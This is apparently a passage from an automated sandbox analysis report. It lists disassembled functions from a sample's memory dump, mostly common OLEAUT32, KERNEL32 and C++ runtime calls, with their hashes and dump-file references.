Opcode Fuzzy Hash: ed328472a123409d9db211723955d07130f1506be7bac314b168b06411782e0e
Instruction Fuzzy Hash: 51B150B17101489BEB38CE1CDED0A9E73A6EB857947144D1CF462CBB81C734E886CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C957FC4 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

UnDecorator::getBasicDataType.LIBCMT ref: 6C957FFF
DName::operator=.LIBCMT ref: 6C958013
DName::operator+=.LIBCMT ref: 6C958021
UnDecorator::getPtrRefType.LIBCMT ref: 6C95804D
UnDecorator::getDataIndirectType.LIBCMT ref: 6C9580CA
UnDecorator::getBasicDataType.LIBCMT ref: 6C9580D3
operator+.LIBCMT ref: 6C958166

Strings

std::nullptr_t, xrefs: 6C958122
volatile, xrefs: 6C95800B, 6C958139

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
String ID: std::nullptr_t$volatile
API String ID: 2203807771-3726895890
Opcode ID: 3c13cc68dcefe826371ac8edfbfd7ece1de3aaa42f55139b6539490acb020986
Instruction ID: 8b203656439e299184abdac33e45087677fb5036415d747e11d48a53b3b6a9ea
Opcode Fuzzy Hash: 3c13cc68dcefe826371ac8edfbfd7ece1de3aaa42f55139b6539490acb020986
Instruction Fuzzy Hash: EF41DEB19A9109EFDB14DFA4C8409ED7B78FB12349FA08567E8515BE40C730C7668B98

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FF95E Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 332COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C8FFA0F
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C8FFA22
SafeArrayGetElement.OLEAUT32 ref: 6C8FFA5A

Part of subcall function 6C903A90: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C903B71
Part of subcall function 6C903A90: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C903B83

Part of subcall function 6C9069C0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C906A08
Part of subcall function 6C9069C0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C906A15
Part of subcall function 6C9069C0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C906A41

SafeArrayDestroy.OLEAUT32(?), ref: 6C9023B3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023C3
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023D6
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023E9
SafeArrayDestroy.OLEAUT32(?), ref: 6C9023FC
SafeArrayDestroy.OLEAUT32(?), ref: 6C90240F

Part of subcall function 6C8FDFB0: SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6C8FDFF6
Part of subcall function 6C8FDFB0: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C8FE003
Part of subcall function 6C8FDFB0: SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6C8FE02F

Strings

RS{m, xrefs: 6C8FFC3E
RS7m, xrefs: 6C8FFC82

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Bound$Destroy$Element
String ID: RS7m$RS{m
API String ID: 959723449-144615663
Opcode ID: 47ab4755c05063f2aef9f16a715a8f1c2df6a4eda2cdeeb3a57a148f78debfcf
Instruction ID: 698a46c940dd8809ede38698e4d3e3525a1733f1ede704ca6a9718d03d821466
Opcode Fuzzy Hash: 47ab4755c05063f2aef9f16a715a8f1c2df6a4eda2cdeeb3a57a148f78debfcf
Instruction Fuzzy Hash: 32C19FB0A01604AFDB14CF68CD84FADB7B9AF94308F20459CE915EB786DB71E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C903690 Relevance: 18.2, APIs: 12, Instructions: 215COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C9036CD
VariantInit.OLEAUT32(?), ref: 6C9036DA
VariantInit.OLEAUT32(?), ref: 6C9036E0
VariantInit.OLEAUT32(?), ref: 6C9036E6
VariantInit.OLEAUT32 ref: 6C9037DD
VariantCopy.OLEAUT32(?,?), ref: 6C9037E4
VariantInit.OLEAUT32 ref: 6C903815
VariantCopy.OLEAUT32(?,?), ref: 6C90381C
VariantClear.OLEAUT32(?), ref: 6C9038A8
VariantClear.OLEAUT32(?), ref: 6C9038AE
VariantClear.OLEAUT32(?), ref: 6C9038B4
VariantClear.OLEAUT32(?), ref: 6C9038BA

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: 1e170fa2088c7966f1ec9481cd5d50cc258fc4ebb7082703fe3b4297bf08098a
Instruction ID: 52dcdbaa04a156f77a00d4aa74b546d1c5064425110ff57fa85f3de906438d32
Opcode Fuzzy Hash: 1e170fa2088c7966f1ec9481cd5d50cc258fc4ebb7082703fe3b4297bf08098a
Instruction Fuzzy Hash: 20816EB1A01219AFDB04DFA9C884FEEBBB9BF59304F14455DE905A7740DB34EA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C90D880 Relevance: 18.2, APIs: 12, Instructions: 202COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C90D8EC
VariantInit.OLEAUT32 ref: 6C90D902
VariantInit.OLEAUT32(?), ref: 6C90D90D
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C90D929
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6C90D966
VariantClear.OLEAUT32(?), ref: 6C90D973
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6C90D9B4
VariantClear.OLEAUT32(?), ref: 6C90D9C1
SafeArrayDestroy.OLEAUT32(?), ref: 6C90DA6F
VariantClear.OLEAUT32(?), ref: 6C90DA80
VariantClear.OLEAUT32(?), ref: 6C90DA87
VariantClear.OLEAUT32(?), ref: 6C90DA99

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: 431ec428b164af8646d59793ac432b3b796d839991ccd7779e87e21637ef9a0d
Instruction ID: b816a5871f9fd68374a31f068cf7f5b24e8867af5ef108146dcbd054cd34807f
Opcode Fuzzy Hash: 431ec428b164af8646d59793ac432b3b796d839991ccd7779e87e21637ef9a0d
Instruction Fuzzy Hash: 278125722083019FD700CFA8C884B5AB7F8FF99714F148A5DE9959B750E774EA05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C8EFC30 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 154fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(00000000,?,?,00000000,65628154), ref: 6C8EFC98
CloseHandle.KERNEL32(FFFFFFFF,?,?,00000000,65628154), ref: 6C8EFCAD
CloseHandle.KERNEL32(?,?,?,00000000,65628154), ref: 6C8EFCB7
SetLastError.KERNEL32(00000000,?,?,00000000,65628154), ref: 6C8EFCBA
CreateFileW.KERNEL32(?,-00000001,00000001,00000000,00000003,00000000,00000000,?,?,00000000,65628154), ref: 6C8EFD01
GetFileSizeEx.KERNEL32(00000000,?,?,?,00000000,65628154), ref: 6C8EFD14
GetLastError.KERNEL32(?,?,00000000,65628154), ref: 6C8EFD2A
CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,00000000,65628154), ref: 6C8EFD6B
MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,00000000,65628154), ref: 6C8EFD98

Strings

.Wu, xrefs: 6C8EFCA1

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastView$MappingSizeUnmap
String ID: .Wu
API String ID: 1303881157-3424199868
Opcode ID: df3162be4e0799202955506830ebdb1781d63cff56f68cb5bb74d7a7fd617cd2
Instruction ID: b7ed26034c1d6bb0eb8e1d6b111690fbbf4ef8d6de5e3ba0b81c35fe54b1b953
Opcode Fuzzy Hash: df3162be4e0799202955506830ebdb1781d63cff56f68cb5bb74d7a7fd617cd2
Instruction Fuzzy Hash: D85106B1704311ABEB10CF79D994B563BA4AB4E364F258A68EC14CF7C5D734D805CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F12A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8F12DD
std::_Xinvalid_argument.LIBCPMT ref: 6C8F12FB
_memmove.LIBCMT ref: 6C8F1368
_memmove.LIBCMT ref: 6C8F139F
std::_Xinvalid_argument.LIBCPMT ref: 6C8F140C

Strings

string too long, xrefs: 6C8F12D8, 6C8F12F6
invalid string position, xrefs: 6C8F1407

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: 917d1978003cfd5b8066b5b4176e809df0067f6e1891c5e1dfb675adf4db47dd
Instruction ID: bdd2c54831852e6bb8385b1b9deec292c9d8d51f5e98c0abf52187a689b33146
Opcode Fuzzy Hash: 917d1978003cfd5b8066b5b4176e809df0067f6e1891c5e1dfb675adf4db47dd
Instruction Fuzzy Hash: 8B41D7713002049BD734CE5DDEC0A9EB3AAEB95794B244E2EE4A2C7F40C7B5D846C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6C90CD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C90CD5C
VariantInit.OLEAUT32(?), ref: 6C90CD65
VariantInit.OLEAUT32(?), ref: 6C90CD6B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C90CD76
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90CDAA
VariantClear.OLEAUT32(?), ref: 6C90CDB7
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C90D2A5
VariantClear.OLEAUT32(?), ref: 6C90D2B5
VariantClear.OLEAUT32(?), ref: 6C90D2BB
VariantClear.OLEAUT32(?), ref: 6C90D2C1

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: c6bdc758396be22cf2a1192a46fd5b547b0cd8b3058f43107ea3b00d892b9ebb
Instruction ID: dc9c4f05fab135d3d19f991f9da9ddb751f6665fa42823cb685a6eedf79472ab
Opcode Fuzzy Hash: c6bdc758396be22cf2a1192a46fd5b547b0cd8b3058f43107ea3b00d892b9ebb
Instruction Fuzzy Hash: 6B121675A15705AFC718DBA8DD84DAAB3B9BF8C300F14466CF50A9BB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C904BA0 Relevance: 15.5, APIs: 10, Instructions: 475COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C904BDC
VariantInit.OLEAUT32(?), ref: 6C904BE5
VariantInit.OLEAUT32(?), ref: 6C904BEB
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C904BF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C904C2A
VariantClear.OLEAUT32(?), ref: 6C904C37
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C905107
VariantClear.OLEAUT32(?), ref: 6C905117
VariantClear.OLEAUT32(?), ref: 6C90511D
VariantClear.OLEAUT32(?), ref: 6C905123

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 271e1f08ccd6d48d940e3fe57064aa0d263d1b8ffef3fb959b8b0f44ec5e9c22
Instruction ID: 886d9b1fb0e21dcc29a5bdfb2695b04b3ce1c11fe305ea8921eb35740ff5566f
Opcode Fuzzy Hash: 271e1f08ccd6d48d940e3fe57064aa0d263d1b8ffef3fb959b8b0f44ec5e9c22
Instruction Fuzzy Hash: 0B120575615705AFC758DBA9DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6C9047D0 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C90480C
VariantInit.OLEAUT32(?), ref: 6C904815
VariantInit.OLEAUT32(?), ref: 6C90481B
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C904826
SafeArrayPutElement.OLEAUT32(00000000,000000FF,?), ref: 6C90485B
VariantClear.OLEAUT32(?), ref: 6C904868
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C904974
VariantClear.OLEAUT32(?), ref: 6C904984
VariantClear.OLEAUT32(?), ref: 6C90498A
VariantClear.OLEAUT32(?), ref: 6C904990

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: a13e680be9f586196d09877658d31f44a3f7f09c4577cdf4d7f7adf29aa6d153
Instruction ID: 5c892e3425cab01c47bd323498e8c40c22c3d0c9ab21e268e738c3ca280e2bca
Opcode Fuzzy Hash: a13e680be9f586196d09877658d31f44a3f7f09c4577cdf4d7f7adf29aa6d153
Instruction Fuzzy Hash: 8E514772A04249AFDB04DFA9C880EAEB7B9FF99714F14456DE505AB640D730E905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FDCD0 Relevance: 15.1, APIs: 10, Instructions: 138COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6C8FDD00
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000003), ref: 6C8FDD10
SafeArrayPutElement.OLEAUT32(00000000,6C902FFF,?), ref: 6C8FDD47
VariantClear.OLEAUT32(?), ref: 6C8FDD4F
SafeArrayPutElement.OLEAUT32(00000000,6C902FFF,?), ref: 6C8FDD6D
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6C8FDDA4
VariantClear.OLEAUT32(?), ref: 6C8FDDAC
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C8FDE16
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C8FDE27
VariantClear.OLEAUT32(?), ref: 6C8FDE31

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Variant$ClearElement$Destroy$CreateInitVector
String ID:
API String ID: 3525949229-0
Opcode ID: e3df559d73a3ffbb58db71fc36f7e54d9b4098bc4f531df846bfb92a169c3522
Instruction ID: f8031f180265ae98b129502d02dee0bb06ab2dc4af78eb85de22d479aefb6eaa
Opcode Fuzzy Hash: e3df559d73a3ffbb58db71fc36f7e54d9b4098bc4f531df846bfb92a169c3522
Instruction Fuzzy Hash: 0C515E75A05209AFDB10DFA5C994EEEBBB8FF59300F11851AEA15A7350DB34D901CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C91C1B0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C91C213

Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C9490ED
Part of subcall function 6C9490D8: __CxxThrowException@8.LIBCMT ref: 6C949102
Part of subcall function 6C9490D8: std::exception::exception.LIBCMT ref: 6C949113

Strings

gfff, xrefs: 6C91C2EA
gfff, xrefs: 6C91C1F2
vector<T> too long, xrefs: 6C91C20E
gfff, xrefs: 6C91C222
gfff, xrefs: 6C91C3A3
gfff, xrefs: 6C91C3F7
gfff, xrefs: 6C91C259

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$gfff$gfff$gfff$gfff$vector<T> too long
API String ID: 1823113695-1254974138
Opcode ID: 394945faa613f11f72024ae79cdcfbf777c8c20ad05f0e2b19d6ed8a52fb3db5
Instruction ID: 442351146f2e88de2899e0c3375668c4b393a08e2f2781683ede1bfe0e8210da
Opcode Fuzzy Hash: 394945faa613f11f72024ae79cdcfbf777c8c20ad05f0e2b19d6ed8a52fb3db5
Instruction Fuzzy Hash: DF9176B1A04209AFC718CF59DC81EEAB7B9EB98314F14861DE519D7B80D730BA04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C8F0CD0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6C8F0D3A
std::_Xinvalid_argument.LIBCPMT ref: 6C8F0D60
_memmove.LIBCMT ref: 6C8F0D95
std::_Xinvalid_argument.LIBCPMT ref: 6C8F0DBF
_memmove.LIBCMT ref: 6C8F0E3E

Strings

string too long, xrefs: 6C8F0D5B, 6C8F0DBA
invalid string position, xrefs: 6C8F0D35

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
